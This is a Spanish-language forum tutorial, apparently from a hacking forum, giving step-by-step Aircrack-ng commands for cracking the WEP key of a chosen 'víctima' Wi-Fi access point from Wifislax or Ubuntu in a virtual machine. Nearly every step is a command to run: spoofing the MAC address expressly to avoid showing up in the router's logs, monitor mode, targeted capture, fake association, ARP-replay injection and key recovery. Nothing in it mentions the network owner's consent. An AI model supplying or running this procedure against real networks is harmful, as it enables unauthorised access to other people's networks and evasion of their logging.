[Hacking Wireless] Suite Aircrack-ng [Ataque 1+3]


{Ataque 1+3} Suite Aircrack-ng [Wifislax 3.1/Ubuntu 9.10]

By $ad



Bueno en este tutorial, hare una Auditoria Wireless desde una máquina virtual (S.O) Wifislax 3.1), ya que es comodo para user de Windows que podran hacer esto sin tener que arrancar el tipico CD-Live de Wifislax, BT4, Wifiway, etc (De esta forma, solo bastaria con hacerlo una vez); pues ya que podran continuar trabajando en Windows sin necesidad de estar expresamente en algun S.O previamente citado, me refiero a Windows porque “en Linux” basta con instalar la suite de Aircrack-ng, si es que no se encuentra preinstalada en la distro.

Lo voy hacer con el software VMWARE Workstation, para aquel que desconozca su funcionamiento le dejo aquí un un tuto de mi bro XD. aetsu:

Tutorial VMWARE Workstation:
Código:
http://206.51.232.10/~h4x0r/foro/index.php?topic=2533.0

O este, donde se emula wifislax con el mismo, en Windows:

Emulación de Wifislax 3.1
Código:
http://206.51.232.10/~h4x0r/foro/index.php?topic=1029.0

Nota: Si tienen problemas para activar su interfaz en VMware, se dirijen a la barra de herramientas de Vmware>VM>Removable>Devices>Buscan la interfaz>Connect.(Hay mas formas de hacerlo, pero no importa):

Para instalar la Suite de aircrack en Ubuntu 9.10:

Código:

sudo apt-get install aircrack-ng

Para instalar Macchanger en Ubuntu 9.10:

Código:

sudo apt-get install macchanger

Bien pues comencemos, una vez instalado el software y S.O en este y en Ubuntu dichos softwares, comenzamos con Wifislax 3.1/Ubuntu 9.10:

Paso Nº1: Comprobamos el nombre que recibe la interfaz de red a utilizar, ya que es importante, para posteriormente adaptarlo en los campos que la necesitemos, para ello, abrimos una shell, y lanzamos el comando:

Código:

ifconfig

Nota: Fijensen en los datos y sobre todo en el nombre correspondiente a esta.

Paso Nº2: Ahora deberemmos detener la interfaz de red a utilizar; lanzando el comando:

Código:

ifconfig [Nombre de la interfaz] down

En mi caso:

Código:

ifconfig wlan0

Paso Nº3: Cambiaremos la dirección MAC de la interfaz de red a utilizar, para que pase de desapercibida la dirección MAC real de esta en la red o logS del router, para ello (En Wifislax 3.1):

Opción Nº1:

Menú principal>wifislax>herramientas wireless>macchanger

*Y escriben cualquier MAC, por ejemplo:

Código:

00:11:22:33:44:55

Opción Nº2: O si adoran la shell (Para Ubuntu 9.10):

Código:

macchanger --mac 00:11:22:33:44:55 [Nombre de la interfaz]



Opción Nº3: O una MAC asignada de manera aleatroria:

Código:

macchanger -A [Nombre de la interfaz]

Paso Nº4: Pasamos a poner la interfaz de red en modo monitor o “modo escucha”:

Código:

airmon-ng start [Nombre de la interfaz]



Nota: Como pueden observar, la interfaz de red, recibió un nuevo nombre [mon0], el cual debemos tener en cuenta para posteriormente incluirlo en las sintaxis nombradas posteriormente.

Paso Nº5: Con el siguiente comando realizamos un scan de las redes que posteriormente nos centraremos en una de ellas,Para ello, abrimos una shell, y escribimos la siguiente sintaxis:

Código:

airodump-ng mon0

Y a continuación se muestra:



Campos que podemos observar:

Código:

dirección MAC (Bssid)
canal del AP (ch)
nombre AP(Essid)
Datos no validos (Beacons)
Velocidad de inyección (#/S)
Datos validos (Data)
ENC-CIPHER-AUTH (Encriptación)
Velocidad y estándar de la red(MB)


Paso Nº6: Es la hora de selecionar una víctima (AP), los parámetros a tener en cuenta son su dirección MAC y el canal de este, abrimos una shell, y escribimos la siguiente sintaxis:

Código:

airodump-ng -w [Nombre del archivo de captura] --bssid [Dirección MAC del AP] -c[canal del AP victima] [Nombre de la interfaz (mon0)].

*Vean como quedaría:



Nota: Los resultados en la carpeta root (Principal de Home) cuyo nombre de captura es sad-1.
Nota: Esta ventana no la cerramos la dejamos tal cual.

Paso Nº7: Para asociarnos con el AP víctima, abrimos una Shell, y escribimos la siguiente sintaxis:

Código:

aireplay-ng -1 15 –e [Nombre AP] –a [MAC AP] –h [MAC NUESTRA] [Nombre de la interfaz (mon0)]

Nota: El valor 15 es importante y depende a la hora de la asociación con la víctima (AP), este incluye un rango desde 0 a 30.
Nota: Con este comando creamos una asociación entre el router y la PC. Debemos intentar una y otra vez hasta que nos aparezca:

Código:

“association sucefull :-)”

Nota: Hasta entonces, no estaremos asociados.


Ataque 1 + 3


Paso Nº8: Abrimos una shell, y escribimos la siguiente sintaxis:

Código:

aireplay-ng -3 –b [MAC AP] –h [MACNUESTRA] [Nombre de la interfaz]



Nota: Con esto comienza el proceso de leer y enviar paquetes (#data$).


Aircrack-ng


Paso Nº9: Para finalizar, lanzamos el Aircrack, para obtener la Pass en claro. Abrimos una "shell", y escribimos la siguiente sintaxis:

Código:

aircrack-ng [Nombre del archivo de captura]

*En mi caso:

Código:

aircrack-ng sad-1.cap

o

aircrack-ptw sad-1.cap